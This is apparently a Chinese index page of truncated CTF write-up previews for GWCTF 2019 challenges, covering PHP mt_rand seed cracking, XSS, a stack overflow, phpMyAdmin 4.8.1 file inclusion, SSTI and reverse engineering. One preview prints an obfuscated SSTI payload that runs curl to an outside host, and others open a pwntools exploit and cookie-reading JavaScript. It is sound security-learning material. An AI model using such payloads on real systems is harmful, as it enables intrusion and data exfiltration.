gwctf专题

(php伪随机数生成)[GWCTF 2019]枯燥的抽奖

审核源码发现加载check.php,审计发现使用了mt_rand()函数,这个函数生成的值是伪随机的 参考下面这篇文章 PHP mt_rand安全杂谈及应用场景详解 - FreeBuf网络安全行业门户 kali里面输入下载工具 git clone https://github.com/openwall/php_mt_seed.git cd进去输入make后编译出的文件先

BUU [GWCTF 2019]mypassword

BUU [GWCTF 2019]mypassword 开题,是个登录界面,也有注册功能 首先我们注册个号看看。然后登录 提示不是SQL注入 有反馈界面,反馈应该管理员会看,可能存在XSS。 查看源码,注释给出了后端源码,对XSS进行了过滤,那就是XSS漏洞了。 根据源码,waf工作原理是把匹配到的危险字符串替换为空,这里看似用来while,可以防止双写等绕过手法,但是存

gwctf_2019_jiandan_pwn1

gwctf_2019_jiandan_pwn1 查看保护 栈溢出,但是会溢出覆盖掉v4,v4是控制数组的,所以我们需要计算好0x110 - 4时候v4的值,然后ret2libc3就可以了 from pwn import *context(arch='amd64', os='linux', log_level='debug')file_name = './z1r0'li = lambda

[BUUCTF][GWCTF 2019]mypassword

首先从登陆界面看到了提示 发现了一串js代码,这段话是什么意思很easy了 if (document.cookie && document.cookie != '') {var cookies = document.cookie.split('; ');var cookie = {};for (var i = 0; i < cookies.length; i++) {var arr = coo

phpmyadmin4.8.1远程文件包含漏洞 [GWCTF 2019]我有一个数据库1

打开题目 我们用dirsearch扫描一下后台看看 扫描结果如下 我们访问一下robots.txt看看,提示有phpinfo.php 那我们访问一下phpinfo.php 发现没有任何信息后我们转去看看phpmyadmin看看 成功访问到页面 在这里我们看到phpmyadmin的版本号是4.8.1 我们百度搜索一下看看 我们知道phpmyadmin4.8.

[GWCTF 2019]你的名字

知识点;ssti 参考: Python模板注入(SSTI)深入学习 wp 外带{% iconfigf ''.__claconfigss__.__mconfigro__[2].__subclaconfigsses__()[59].__init__.func_glconfigobals.lineconfigcache.oconfigs.popconfigen('curl https://sfg5

[GWCTF 2019]pyre(详细解题)

目录 备用知识: pyc文件是从什么格式转化过来的: pyc文件怎么生成的: pyc反编译成py: 解题开始: 工具: python反编译 - 在线工具 (tool.lu)https://tool.lu/pyc/ 解题思路: 备用知识: pyc文件是从什么格式转化过来的: pyc文件就是由Python文件经过编译后所生成的文件,py文件编译成pyc文件后加载速度更快而

vm虚拟机逆向---[GWCTF 2019]babyvm 复现【详解】

文章目录 前言题目分析CD1mov指令xor指令and其他指令 E0BF83 汇编提取编写exp 前言 好难。大家都觉得简单,就我觉得难是吧,,,,, 题目分析 、 代码看着挺少,三个主要函数,一开始好像是sub_CD1的,调试的时候变了,不影响。 还是一样的几个技巧,返回类型可以改成 void;形参可以改成_DWORD *reg 名称什么的也可以改改,问题也不

BUUCTF [GWCTF 2019]pyre 1

这题是一个pyc文件 文章目录 什么是pyc文件?反编译pyc文件题解讲解源代码解密1源代码解密2 参考 什么是pyc文件? 参考 Python 并非完全是解释性语言,它也存在编译。先将源码文件 *.py 编译为 *.pyc,然后由 Python 的虚拟机执行 PYC文件是Python编程语言的字节码文件。当Python程序执行时,Python解释器会将.py文

[GWCTF 2019]我有一个数据库 phpMyAdmin 4.8.1后台文件包含漏洞

一开始打开是乱码 之前题目做过修复乱码的,得到这个 用dirsearch扫一下 一开始我是看到robots.txt 访问一下 访问一下phpinfo 也没啥,看到phpmyadimin 访问一下 没啥思路,看了wp 看到phpMyAdmin 4.8.1后台文件包含漏洞(CVE-2018-12613)https://blog.csdn.net/qq_45521281/art